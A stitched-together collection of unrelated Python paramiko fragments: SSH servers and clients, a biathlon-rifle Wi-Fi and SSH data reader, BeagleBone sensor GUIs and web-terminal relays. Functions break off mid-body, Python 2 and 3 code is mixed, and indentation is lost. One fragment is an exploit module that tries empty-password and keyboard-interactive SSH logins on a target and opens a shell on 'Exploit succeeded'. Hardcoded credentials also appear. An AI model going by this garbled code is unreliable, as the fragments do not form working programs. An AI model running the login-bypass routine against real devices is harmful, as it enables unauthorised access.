# logging.basicConfig(level=logging.INFO, format='%(levelname)s %(threadName)s %(message)s')
# log.s/etLevel(logging.INFO)
HOST_ADDRESS = ''
PORT = 2200
if __name__ == "__main__":
host_key = paramiko.RSAKey(filename='test_rsa.key')
fingerprint = ":".join(chunks(u(hexlify(host_key.get_fingerprint())), 2))
log.info(f'Read host key fingerprint={fingerprint}')
log.debug(f'Read host key fingerprint={fingerprint}')
server = SSHServer(
address=HOST_ADDRESS,
port=PORT,
host_key=host_key,
middleware=[WelcomeMiddleware],
commands=[
Ls,
Cd,
Whoami,
],
)
server.listen()
if os.path.isfile(key_file) is False:
print("Key file does not exist: {:s}".format(key_file))
sys.exit(1)
print("Using {:s}".format(key_file))
if os.path.isfile(key_file):
host_key = paramiko.RSAKey(filename=key_file, password=socket.gethostname())
else:
print("Generating host key...")
host_key = paramiko.RSAKey.generate(bits=key_bits)
if savestate is not False:
print("Saving generated key as {:s}".format(key_file))
host_key.write_private_key_file(key_file, password=socket.gethostname())
keyhash = hexlify(host_key.get_fingerprint())
if pyV is 3:
keyhash = u(keyhash)
print("Host fingerprint: {:s}".format((":".join([keyhash[i:2+i] for i in range(0, len(keyhash), 2)]))))
if args['--log'] is not None:
logfile = str(args['--log'])
print("Logging is on: {:s}".format(logfile))
paramiko.util.log_to_file(logfile) #Enable logging
if args['--port'] is not None:
host_port = int(args['--port'])
print("Listening for connections on port {:d}...".format(host_port))
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('', host_port))
def connectPi():
global adc_value1, adc_value2, ptr, run_started, client, wifi
# # first check if biathlon_rifle is current network
# if "biathlon_rifle" in subprocess.check_output("iwgetid -r"):
# print("Connected to rifle!")
# else:
# print("Please connect to the rifle.")
# sys.exit(1)
# setup logging
paramiko.util.log_to_file('demo_simple.log')
# check if the biathlon rifle is within range
import objc
objc.loadBundle(
'CoreWLAN',
bundle_path='/System/Library/Frameworks/CoreWLAN.framework',
module_globals=globals())
iface = CWInterface.interface()
networks, error = iface.scanForNetworksWithName_error_(
'biathlon_rifle', None)
# if no error, biathlon rifle is nearby
# if str(error) == 'None':
# print('Biathlon rifle is nearby.')
# else:
# print('Biathlon rifle is not nearby, please try and get closer to connect.')
# sys.exit(2)
# returns list of nearby networks
network_list = os.popen(
"/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --scan | awk '{print $1}'"
)
# is rifle nearby? initialize to false.
rifle_nearby = False
while 1:
line = network_list.readline()
if line == 'biathlon_rifle\n':
rifle_nearby = True
if not line:
break
# if rifle is nearby, proceed
if rifle_nearby == True:
print('Biathlon rifle is nearby.')
else:
print(
'Biathlon rifle is not nearby, please try and get closer to connect.'
)
sys.exit(2)
network = networks.anyObject()
# if not currently connected to rifle, try to connect to it
# returns currently connected wifi network
current_network = os.popen(
"/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -I | awk '/ SSID/ {print substr($0, index($0, $2))}'"
)
# check if we are currently connected to rifle, if not then try to connect to it
connected_to_rifle = False
while 1:
line = current_network.readline()
if line == 'biathlon_rifle\n':
connected_to_rifle = True
if not line:
break
if connected_to_rifle == False:
# if no error, successfully connected to rifle
success, error = iface.associateToNetwork_password_error_(
network, 'biathlon', None)
if str(error) == 'None':
print('Successfully connected to rifle!')
else:
print('Unable to connnect to rifle')
sys.exit(2)
else:
print('Already connected to rifle!')
# Paramiko client configuration
UseGSSAPI = paramiko.GSS_AUTH_AVAILABLE # enable "gssapi-with-mic" authentication, if supported by your python installation
DoGSSAPIKeyExchange = paramiko.GSS_AUTH_AVAILABLE # enable "gssapi-kex" key exchange, if supported by your python installation
# UseGSSAPI = False
# DoGSSAPIKeyExchange = False
# adc_value initialized for two channels
adc_value1_temp = 0
adc_value2_temp = 0
time = 0
# now, connect and use paramiko Client to negotiate SSH2 across the connection
try:
# get hostname
username = '******'
password = '******'
hostname = '192.168.4.1'
port = 22
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
print('*** Starting ssh...')
if not UseGSSAPI and not DoGSSAPIKeyExchange:
client.connect(hostname, port, username, password)
else:
try:
client.connect(hostname,
port,
username,
gss_auth=UseGSSAPI,
gss_kex=DoGSSAPIKeyExchange)
except Exception:
# traceback.print_exc()
password = getpass.getpass('Password for %s@%s: ' %
(username, hostname))
client.connect(hostname, port, username, password)
chan = client.invoke_shell()
# print(repr(client.get_transport()))
print('*** Successfully started ssh!')
run_started = True
# send relevant messages to start adc reading and print to terminal
# in the future this will be synchronized with animated graph
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
# send command to Pi to trigger data collection and gather the results through ssh
chan.send('python ~/biathlon/demo_readvoltage.py\n')
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
# save numbers once they start coming in, we assume both sensors are always connected
# first check to see if both sensors are attached
# zero attached
# if len(x.split(' ')) == 2:
# print('No sensors attached!')
# only one attached
if len(x.split(' ')) == 3:
# check which one is attached
if x[:3] == 'Ch1':
adc_value1_temp = float(x.split(' ')[1])
adc_value1.append(adc_value1_temp)
elif x[:3] == 'Ch2':
adc_value2_temp = float(x.split(' ')[1])
adc_value2.append(adc_value2_temp)
ptr += 1
print(x + '\r')
# both attached
elif len(x.split(' ')) == 4:
adc_value1_temp = float(x.split(' ')[1])
adc_value1.append(adc_value1_temp)
adc_value2_temp = float(x.split(' ')[3])
adc_value2.append(adc_value2_temp)
ptr += 1
print(x + '\r')
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
chan.send(x)
chan.close()
client.close()
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
except Exception as e:
print('*** Caught exception: %s: %s' % (e.__class__, e))
traceback.print_exc()
try:
client.close()
except:
pass
sys.exit(1)
def info_hub(self, user, host, passwd='123'):
''' 连接后端服务器 '''
try:
log.info('connect host ...')
ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host,
port=22,
username=user,
password=passwd,
compress=True)
self.bchan = ssh.invoke_shell(term='vt100',
width=self.fchan.win_width,
height=self.fchan.win_height)
self.fchan.send('\r\n')
except paramiko.ssh_exception.BadHostKeyException:
log.error(u"The server's host key could not be verified")
return 1
except paramiko.ssh_exception.AuthenticationException:
log.error(u"Authentication failed")
return 1
except paramiko.ssh_exception.SSHException:
log.error(u"Other error connecting or establishing an SSH session")
return 1
except Exception:
log.error(u"A socket error occurred while connecting")
return 1
if self.bchan is None:
return 1
''' 注册前端channel和后端channel到事件驱动 '''
self.sel.register(self.fchan, selectors.EVENT_READ)
self.sel.register(self.bchan, selectors.EVENT_READ)
while True:
events = self.sel.select()
'''
self.fchan.event is set in server.py
通过线程事件监控用户窗口是否变化,变化则重绘窗口
'''
if self.fchan.event.is_set():
self.fchan.event.clear()
width = self.fchan.win_width
height = self.fchan.win_height
self.bchan.resize_pty(width, height)
''' 监听channel '''
if self.fchan in [t[0].fileobj for t in events]:
try:
x = u(self.fchan.recv(1024))
if len(x) == 0:
self.fchan.send(
'\r\n*** Welcome next time ***\r\n\r\n')
break
self.bchan.send(x)
except Exception:
log.error('fchan error')
if self.bchan in [t[0].fileobj for t in events]:
try:
x = u(self.bchan.recv(1024))
if len(x) == 0:
self.fchan.send('Connection to %s closed.' % host)
break
self.fchan.send(x)
except Exception:
log.error('bchan error')
def run(self):
print_status("Running module")
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(self.target,
username='',
allow_agent=False,
look_for_keys=False)
except paramiko.ssh_exception.SSHException:
pass
trans = client.get_transport()
try:
trans.auth_password(username='******',
password='',
event=None,
fallback=True)
except paramiko.ssh_exception.AuthenticationException:
pass
except:
print_status("Error with Existing Session. Wait few minutes.")
return
try:
trans.auth_interactive(username='******',
handler=self.custom_handler)
chan = client.invoke_shell()
except:
print_error("Exploit failed")
return
print_success("Exploit succeeded")
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def posix_shell(chan, channel, width=90, height=40):
from OMBA.asgi import channel_layer
stdout = list()
begin_time = time.time()
last_write_time = {'last_activity_time': begin_time}
try:
chan.settimeout(0.0)
while True:
try:
x = u(chan.recv(1024))
if len(x) == 0:
channel_layer.send(
channel,
{
'text': json.dumps(
[
'disconnect',
smart_unicode('\r\n*** EOF\r\n')
]
)
}
)
break
now = time.time()
delay = now - last_write_time['last_activity_time']
last_write_time['last_activity_time'] = now
if x == "exit\r\n" or x == "logout\r\n" or x == 'logout':
chan.close()
else:
stdout.append(
[
delay,
codecs.getincrementaldecoder('UTF-8')('replace').decode(x)
]
)
channel_layer.send(
channel,
{
'text': json.dumps(
[
'stdout',
smart_unicode(x)
]
)
}
)
except socket.timeout:
pass
except Exception, e:
channel_layer.send(
channel,
{
'text': json.dumps(
[
'stdout',
'A bug find, You can report it to me' + smart_unicode(e)
]
)
}
)
finally:
pass
def readline(self, size=None):
"""
Read one entire line from the file. A trailing newline character is
kept in the string (but may be absent when a file ends with an
incomplete line). If the size argument is present and non-negative, it
is a maximum byte count (including the trailing newline) and an
incomplete line may be returned. An empty string is returned only when
EOF is encountered immediately.
.. note::
Unlike stdio's ``fgets``, the returned string contains null
characters (``'\\0'``) if they occurred in the input.
:param int size: maximum length of returned string.
:returns:
next line of the file, or an empty string if the end of the
file has been reached.
If the file was opened in binary (``'b'``) mode: bytes are returned
Else: the encoding of the file is assumed to be UTF-8 and character
strings (`str`) are returned
"""
# it's almost silly how complex this function is.
if self._closed:
raise IOError('File is closed')
if not (self._flags & self.FLAG_READ):
raise IOError('File not open for reading')
line = self._rbuffer
truncated = False
while True:
if (
self._at_trailing_cr and
self._flags & self.FLAG_UNIVERSAL_NEWLINE and
len(line) > 0
):
# edge case: the newline may be '\r\n' and we may have read
# only the first '\r' last time.
if line[0] == linefeed_byte_value:
line = line[1:]
self._record_newline(crlf)
else:
self._record_newline(cr_byte)
self._at_trailing_cr = False
# check size before looking for a linefeed, in case we already have
# enough.
if (size is not None) and (size >= 0):
if len(line) >= size:
# truncate line
self._rbuffer = line[size:]
line = line[:size]
truncated = True
break
n = size - len(line)
else:
n = self._bufsize
if (
linefeed_byte in line or
(
self._flags & self.FLAG_UNIVERSAL_NEWLINE and
cr_byte in line
)
):
break
try:
new_data = self._read(n)
except EOFError:
new_data = None
if (new_data is None) or (len(new_data) == 0):
self._rbuffer = bytes()
self._pos += len(line)
return line if self._flags & self.FLAG_BINARY else u(line)
line += new_data
self._realpos += len(new_data)
# find the newline
pos = line.find(linefeed_byte)
if self._flags & self.FLAG_UNIVERSAL_NEWLINE:
rpos = line.find(cr_byte)
if (rpos >= 0) and (rpos < pos or pos < 0):
pos = rpos
if pos == -1:
# we couldn't find a newline in the truncated string, return it
self._pos += len(line)
return line if self._flags & self.FLAG_BINARY else u(line)
xpos = pos + 1
if (
line[pos] == cr_byte_value and
xpos < len(line) and
line[xpos] == linefeed_byte_value
):
xpos += 1
# if the string was truncated, _rbuffer needs to have the string after
# the newline character plus the truncated part of the line we stored
# earlier in _rbuffer
if truncated:
self._rbuffer = line[xpos:] + self._rbuffer
else:
self._rbuffer = line[xpos:]
lf = line[pos:xpos]
line = line[:pos] + linefeed_byte
if (len(self._rbuffer) == 0) and (lf == cr_byte):
# we could read the line up to a '\r' and there could still be a
# '\n' following that we read next time. note that and eat it.
self._at_trailing_cr = True
else:
self._record_newline(lf)
self._pos += len(line)
return line if self._flags & self.FLAG_BINARY else u(line)
def init_paramiko():
# needed parameters for connection
port = 22
hostname = 'beaglebone'
username = '******'
password = '******'
##############################
#determine if we are in linux or windows
try:
import termios
import tty
has_termios = True
except ImportError:
has_termios = False
try:
global chan
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
print("*** Connecting...")
client.connect(hostname, port, username, password)
chan = client.invoke_shell()
print(repr(client.get_transport()))
output.insert("end-1c", '*** SSH Connection to BB_AI stablished ***\n')
chan.send('python3 bb.py\n')
print("*** SSH Connection to BB_AI stablished!\n")
###########################################################################
if has_termios:
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
c = 0
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write("\r\n*** Done ***\r\n")
chan.close()
client.close()
break
#strip non useful info
if c <= 1:
data = data[400:]
c += 1
if str(data).startswith('debian@beaglebone:~$'):
data = str(data).replace(
'debian@beaglebone:~$ python3 bb.py', ' ')
if str(data).startswith('python3'):
data = str(data).replace('python3 bb.py', ' ')
if start_parsing:
# Parse the sensor values
if 'Sensor' in str(data):
#change the box color to red to indicate warning
if float(data[16:19]) > 1.0:
box1["bg"] = "#fb9898" #light red
box1["fg"] = "black"
box1.insert(END, "")
#box_color_change("red", "black", "box1")
box1.delete(1.0, END)
box1.insert('1.0', data[16:19])
#
box2.delete(1.0, END)
box2.insert("1.0", data[20:23])
#
box3.delete(1.0, END)
box3.insert("1.0", data[24:27])
#
box4.delete(1.0, END)
box4.insert("1.0", data[28:31])
#
box5.delete(1.0, END)
box5.insert("1.0", data[32:35])
#
box6.delete(1.0, END)
box6.insert("1.0", data[36:39])
#
'''
box7.delete(1.0, END)
box7.insert("1.0",data[40:43])
#
box8.delete(1.0, END)
box8.insert("1.0",data[44:47])
#
box9.delete(1.0, END)
box9.insert("1.0",data[40:43])
#
box10.delete(1.0, END)
box10.insert("1.0",data[44:47])
#
box11.delete(1.0, END)
box11.insert("1.0",data[48:51])
#
box12.delete(1.0, END)
box12.insert("1.0",data[52:55])
#
box13.delete(1.0, END)
box13.insert("1.0",data[56:59])
#
box14.delete(1.0, END)
box14.insert("1.0",data[60:63])
#
box15.delete(1.0, END)
box15.insert("1.0",data[64:67])
#
box16.delete(1.0, END)
box16.insert("1.0",data[68:71])
'''
if 'Sensor' in str(x):
continue
output.insert("end-1c", x)
output.see("end")
#for testing
#print(x, end= '\r', flush= True)
#sys.stdout.write(x)
#sys.stdout.flush()
except socket.timeout:
pass
if not ON:
return "Exiting GUI"
#writing in console
'''
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
chan.send(x)
'''
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
# if we are in a windows based environment
else:
def writeall(sock):
count = 0
while True:
data = sock.recv(9999).decode('utf8')
if not data or not ON:
sys.stdout.write("\r\n*** Done ***\r\n\r\n")
sys.stdout.flush()
chan.close()
client.close()
break
#strip non useful info
if count <= 1:
data = data[400:]
count += 1
if str(data).startswith('debian@beaglebone:~$'):
data = str(data).replace(
'debian@beaglebone:~$ python3 bb.py', ' ')
if str(data).startswith('python3'):
data = str(data).replace('python3 bb.py', ' ')
if start_parsing:
# Parse the sensor values
if 'Sensor' in str(data):
#change the box color to red to indicate warning
if float(data[16:19]) > 1.0:
box1["bg"] = "#fb9898" #light red
box1["fg"] = "black"
box1.insert(END, "")
#box_color_change("red", "black", "box1")
box1.delete(1.0, END)
box1.insert('1.0', data[16:19])
#
box2.delete(1.0, END)
box2.insert("1.0", data[20:23])
#
box3.delete(1.0, END)
box3.insert("1.0", data[24:27])
#
box4.delete(1.0, END)
box4.insert("1.0", data[28:31])
#
box5.delete(1.0, END)
box5.insert("1.0", data[32:35])
#
box6.delete(1.0, END)
box6.insert("1.0", data[36:39])
#
'''
box7.delete(1.0, END)
box7.insert("1.0",data[40:43])
#
box8.delete(1.0, END)
box8.insert("1.0",data[44:47])
#
box9.delete(1.0, END)
box9.insert("1.0",data[40:43])
#
box10.delete(1.0, END)
box10.insert("1.0",data[44:47])
#
box11.delete(1.0, END)
box11.insert("1.0",data[48:51])
#
box12.delete(1.0, END)
box12.insert("1.0",data[52:55])
#
box13.delete(1.0, END)
box13.insert("1.0",data[56:59])
#
box14.delete(1.0, END)
box14.insert("1.0",data[60:63])
#
box15.delete(1.0, END)
box15.insert("1.0",data[64:67])
#
box16.delete(1.0, END)
box16.insert("1.0",data[68:71])
'''
if 'Sensor' in str(data):
continue
output.insert("end-1c", data)
output.see("end")
#for testing
#print(data, end= '\r', flush= True)
if not ON:
return "Exiting GUI"
writer = threading.Thread(target=writeall, args=(chan, ))
writer.start()
except Exception as e:
print("*** Caught exception: %s: %s" % (e.__class__, e))
traceback.print_exc()
try:
client.close()
except:
pass
sys.exit(1)
chan = tran.open_session()
# 获取一个终端
chan.get_pty()
# 激活器
chan.invoke_shell()
while True:
# 监视用户输入和服务器返回数据
# sys.stdin 处理用户输入
# chan 是之前创建的通道,用于接收服务器返回信息
readable, writeable, error = select.select([
chan,
sys.stdin,
], [], [], 1)
if chan in readable:
try:
x = u(chan.recv(1024))
if len(x) == 0:
print('\r\n*** EOF\r\n')
break
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in readable:
inp = sys.stdin.readline()
chan.sendall(inp)
chan.close()
tran.close()
def init_paramiko():
# needed parameters for connection
port = 22
hostname = 'beaglebone'
username = '******'
password = '******'
#For testing with usb
#hostname = '192.168.7.2'
##############################
#determine if we are in linux or windows
try:
import termios
import tty
has_termios = True
except ImportError:
has_termios = False
try:
global chan
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
print("*** Connecting...")
client.connect(hostname, port, username, password)
chan = client.invoke_shell()
print(repr(client.get_transport()))
output.insert("end-1c",
'*** SSH Connection to BB_AI stablished ***\n\n')
global flag_1
flag_1 = True # This flag is created with the objective that Automatic Shutdown button can only
# work if an SSH connection is actually stablished
#chan.flush()
chan.send('python3 multiprocessingbb.py\n')
print("*** SSH Connection to BB_AI stablished!\n")
#creating the log file
#if the file exist
if path.exists("log_gui.txt"):
#then append to the existing file
file = open("log_gui.txt", "+a")
else:
#create a new one
file = open("log_gui.txt", "+w")
###########################################################################
if has_termios:
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
c = 0
x = u(chan.recv(1024).decode('utf8'))
if len(x) == 0:
sys.stdout.write("\r\n*** Done ***\r\n")
chan.close()
client.close()
break
#strip non useful info
#strip non useful info with a more specific approach is better
if 'The programs' in str(x) or 'GNU/Linux' in str(x) \
or 'exact distribution' in str(x) or '@beaglebone' in str(x) \
or 'python3' in str(x) or 'bb.py' in str(x):
length = len(x)
x = x[length:]
if 'PORTLAND' in str(x):
global sig
sig = True
# Once done slicing the greeting section lest get State status
#global sig
global count
if sig:
if count >= 1:
chan.send('status\n')
#global sig
sig = False
#global count
count += 1
if 'State :' in str(x) or 'tate :' in str(x):
global state_preview
state_preview = x[8:].replace('[K', '')
if start_parsing:
box18.delete(1.0, END)
box18.insert("1.0", state_preview)
# Parse the sensor values
if 'Sensor' in str(x):
#change the box color to red to indicate warning
#for testing
#x = x.split(' ')
x = x + ' 0 1 2 1 1 2 1 0 0'
s_val = x.replace('\x1b[F\r',
'').split(' ')
#for testing only (for the case where we get less than 30 sensor values)
if not len(s_val) == 41:
while len(s_val) < 41:
s_val.insert(32, '0')
s_val = s_val[2:19] + s_val[32:41]
s_val = map(float, s_val)
s_val = list(s_val)
obj_list = [box1, box2, box3, box4, box5, box6, box7, box8, box9, box10, box11, box12, box13, box14, box15, box16, \
box17, c1, c2, c3, c4, c5, c6, c7, c8, c9]
lenq = len(s_val)
for index in range(len(s_val)):
for index in range(0, 17):
if s_val[index] > 1:
#change the box color when outside valid range
box_color_change(
obj_list[index], "#fb9898")
# if the sensor value is withing the spected range then keep box color yellow
obj_list[index].delete(1.0, END)
obj_list[index].insert(
'1.0', s_val[index])
for index in range(17, 26):
# if the valve is turned ON then light up GREEN
if s_val[index] == 1:
valve_position_color(
obj_list[index], "#58df52")
# if the valve is turned OFF then light up BLUE
elif s_val[index] == 0:
valve_position_color(
obj_list[index], "blue")
# if there is an error with the valve light up RED
elif s_val[index] == 2:
valve_position_color(
obj_list[index], "red")
if 'Sensor' in str(x):
continue
x = x.replace('[K', '')
output.insert("end-1c", x)
output.see("end")
#for testing
#print(x, end= '\r', flush= True)
#sys.stdout.write(x)
#sys.stdout.flush()
except socket.timeout:
pass
if not ON:
return "Exiting GUI"
#writing in console
'''
if sys.stdin in r:
x = sys.stdin.read(1)
if len(x) == 0:
break
chan.send(x)
'''
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
#############################################################################
# if we are in a windows.
#############################################################################
else:
#global count
def writeall(sock):
global sig_to_resend
while True:
data = ' '
data = sock.recv(9999).decode('utf8')
file.write(data + '\n')
if not data or not ON:
sys.stdout.write("\r\n*** Done ***\r\n\r\n")
sys.stdout.flush()
file.close()
chan.close()
client.close()
break
#Make sure we always have only one data packet
if 'Sensor' in data:
spl = data.split('\r')
#splitting the sensor values and adding the to a FIFO Queue
for index in range(len(spl)):
if len(spl[index]) > 0:
q.put(spl[index])
#for testing
#print(data, end= '\r', flush= True)
#strip non useful info with a more specific approach is better
if 'The programs' in str(data) or 'GNU/Linux' in str(data) \
or 'exact distribution' in str(data) or '@beaglebone' in str(data) \
or 'python3' in str(data) or 'bb.py' in str(data):
length = len(data)
data = data[length:]
if 'PORTLAND' in str(data):
global sig
sig = True
# Once done slicing the greeting section lest get State status
#global sig
global count
if sig:
#wait till next time around
if count >= 1:
chan.send('status\n')
#global sig
sig = False
#sig_to_resend = True
#global count
count += 1
#for testing
#print(data)
if 'State :' in str(data) or 'tate :' in str(data):
global state_preview
index = data.find(':')
if not index == -1:
state_preview = str(data[index + 1:]).replace(
'[K', '').replace('\x1b', ' ')
#for testing
print(state_preview)
else:
#state_preview = str(data[8:]).replace('[K', '').replace('\x1b', ' ')
pass
if start_parsing:
#Always display the current state in the P&ID window
box18.delete(1.0, END)
box18.insert("1.0", state_preview)
# Parse the sensor values
if 'Sensor values:' in str(data):
# for testing (prints sensor values )
#print(data, end= '\r', flush= True)
#change the box color to red to indicate warning
#for testing
#x = x.split(' ')
data = q.get()
index2 = data.find(':')
if not index == -1:
data = data[index2 + 2:].replace('\x1b[F', '')
data = data + ' 0 1 2 1 1 2 1 0 0'
s_val = data.split(' ')
#for testing only (for the case where we get less than 30 sensor values)
if not len(s_val) == 39:
while len(s_val) < 39:
s_val.insert(30, '0')
s_val = s_val[0:17] + s_val[30:39]
mapping = map(float, s_val)
s_val = list(mapping)
obj_list = [box1, box2, box3, box4, box5, box6, box7, box8, box9, box10, box11, box12, box13, box14, box15, box16, \
box17, c1, c2, c3, c4, c5, c6, c7, c8, c9]
lenq = len(s_val)
for index in range(len(s_val)):
for index in range(0, 17):
if s_val[index] > 1:
#change the box color when outside valid range
box_color_change(
obj_list[index], "#fb9898")
# if the sensor value is withing the spected range then keep box color yellow
obj_list[index].delete(1.0, END)
obj_list[index].insert('1.0', s_val[index])
for index in range(17, 26):
# if the valve is turned ON then light up GREEN
if s_val[index] == 1:
valve_position_color(
obj_list[index], "#58df52")
# if the valve is turned OFF then light up BLUE
elif s_val[index] == 0:
valve_position_color(
obj_list[index], "blue")
# if there is an error with the valve light up RED
elif s_val[index] == 2:
valve_position_color(
obj_list[index], "red")
#format the data back to distinguis from the screen we want to print to
data = f'Sensor values: {data}'
if 'Sensor' in str(data):
continue
output.insert("end-1c", str(data).replace('\x1b[K', ' '))
output.see("end")
if not ON:
return "Exiting GUI"
writer = threading.Thread(target=writeall, args=(chan, ))
#writer.daemon = True
writer.start()
except Exception as e:
print("*** Caught exception: %s: %s" % (e.__class__, e))
traceback.print_exc()
if '[Errno 11001] getaddrinfo failed' == str(e):
output.insert("end-1c", f' Error connecting to BB_AI.\n')
elif '[WinError 10060]' in str(e):
output.insert("end-1c", f' Error connecting to BB_AI.\n')
try:
client.close()
except:
pass
sys.exit(1)
import os
import socket
import sys
import threading
import traceback
import paramiko
from paramiko.py3compat import b, u, decodebytes
# setup logging
paramiko.util.log_to_file('demo_server.log')
host_key = paramiko.RSAKey(filename='test_rsa.key')
#host_key = paramiko.DSSKey(filename='test_dss.key')
print('Read key: ' + u(hexlify(host_key.get_fingerprint())))
class Server(paramiko.ServerInterface):
# 'data' is the output of base64.b64encode(key)
# (using the "user_rsa_key" files)
data = (b'AAAAB3NzaC1yc2EAAAABIwAAAIEAyO4it3fHlmGZWJaGrfeHOVY7RWO3P9M7hp'
b'fAu7jJ2d7eothvfeuoRFtJwhUmZDluRdFyhFY/hFAh76PJKGAusIqIQKlkJxMC'
b'KDqIexkgHAfID/6mqvmnSJf0b5W8v5h2pI/stOSwTQ+pxVhwJ9ctYDhRSlF0iT'
b'UWT10hcuO4Ks8=')
good_pub_key = paramiko.RSAKey(data=decodebytes(data))
def __init__(self):
self.event = threading.Event()
def check_channel_request(self, kind, chanid):
def posix_shell(chan, channel, log_name=None):
from webterminal.asgi import channel_layer
stdout = list()
begin_time = time.time()
last_write_time = {'last_activity_time': begin_time}
try:
chan.settimeout(0.0)
while True:
try:
x = u(chan.recv(1024))
if len(x) == 0:
channel_layer.send(
channel, {
'text':
json.dumps([
'disconnect',
smart_unicode('\r\n*** EOF\r\n')
])
})
break
now = time.time()
delay = now - last_write_time['last_activity_time']
last_write_time['last_activity_time'] = now
if x == "exit\r\n" or x == "logout\r\n" or x == 'logout':
pass
else:
stdout.append([
delay,
codecs.getincrementaldecoder('UTF-8')(
'replace').decode(x)
])
channel_layer.send(
channel,
{'text': json.dumps(['stdout', smart_unicode(x)])})
except socket.timeout:
pass
except Exception, e:
channel_layer.send(
channel, {
'text':
json.dumps([
'stdout', 'A bug find,You can report it to me' +
smart_unicode(e)
])
})
finally:
attrs = {
"version":
1,
"width":
90, #int(subprocess.check_output(['tput', 'cols'])),
"height":
40, #int(subprocess.check_output(['tput', 'lines'])),
"duration":
round(time.time() - begin_time, 6),
"command":
os.environ.get('SHELL', None),
'title':
None,
"env": {
"TERM": os.environ.get('TERM'),
"SHELL": os.environ.get('SHELL', 'sh')
},
'stdout':
list(map(lambda frame: [round(frame[0], 6), frame[1]], stdout))
}
mkdir_p('/'.join(os.path.join(MEDIA_ROOT, log_name).rsplit('/')[0:-1]))
with open(os.path.join(MEDIA_ROOT, log_name), "a") as f:
f.write(
json.dumps(attrs,
ensure_ascii=False,
cls=CustomeFloatEncoder,
indent=2))
audit_log = SshLog.objects.get(
channel=channel, log=log_name.rsplit('/')[-1].rsplit('.json')[0])
audit_log.is_finished = True
audit_log.end_time = timezone.now()
audit_log.save()
def check_auth_publickey(self, username, key):
print('Auth attempt with key: ' + u(hexlify(key.get_fingerprint())))
if (username == 'robey') and (key == self.good_pub_key):
return paramiko.AUTH_SUCCESSFUL
return paramiko.AUTH_FAILED
def posix_shell(chan, user_obj, host_and_sysuser_obj, log_info_caches,
log_record):
"""
:param chan: 连接实例
:param user_obj: 用户实例
:param host_and_sysuser_obj: 主机及主机用户实例
:param log_info_caches: log缓存
:param log_record: log_record方法
:return:
"""
import select
oldtty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
chan.settimeout(0.0)
cmd = ""
tab_flag = False
while True:
r, w, e = select.select([chan, sys.stdin], [], [])
if chan in r:
try:
x = u(chan.recv(1024))
if len(x) == 0:
sys.stdout.write('\r\n*** EOF\r\n')
break
if tab_flag: # 如果有回车就记录返回值
cmd += x
tab_flag = False
sys.stdout.write(x)
sys.stdout.flush()
except socket.timeout:
pass
if sys.stdin in r:
x = sys.stdin.read(1)
if x != "\r":
cmd += x
if x == '\t':
tab_flag = True
else:
# print("==>", cmd)
# 生成日志的表格
log_info = db_modles.AuditLog(
userprofile_id=user_obj.id,
hostandsysuser_id=host_and_sysuser_obj.id,
action_type="cmd",
cmd=cmd,
data=datetime.datetime.now())
log_info_caches.append(log_info)
cmd = ""
if len(log_info_caches) >= 10:
log_record(log_info_caches)
log_info_caches = []
if len(x) == 0:
break
chan.send(x)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
def _parse_userauth_banner(self, m):
banner = m.get_string()
self.banner = banner
self._log(INFO, "Auth banner: {}".format(u(banner)))
# 设置新的tty
try:
# tty.setraw(sys.stdin.fileno())
# chan.settimeout(0.0)
# 下面是核心逻辑
# 在这里就是死循环不断接受用户的数据,提交给服务器端执行,然后服务器端返回结构
# 利用select 来见他那个file-like 对象的变化
# 监听的对象有: sys.stdin chan
while True:
rlist, wlist, elist = select.select([sys.stdin, chan], [], [], 1)
if chan in rlist:
# 收到了服务器的数据,那就显示
try:
text = u(chan.recv(1024)) # python3 才需要这样设置一下, text 是str
sys.stdout.write(text)
sys.stdout.flush()
except Exception as e:
print(e)
break
if sys.stdin in rlist:
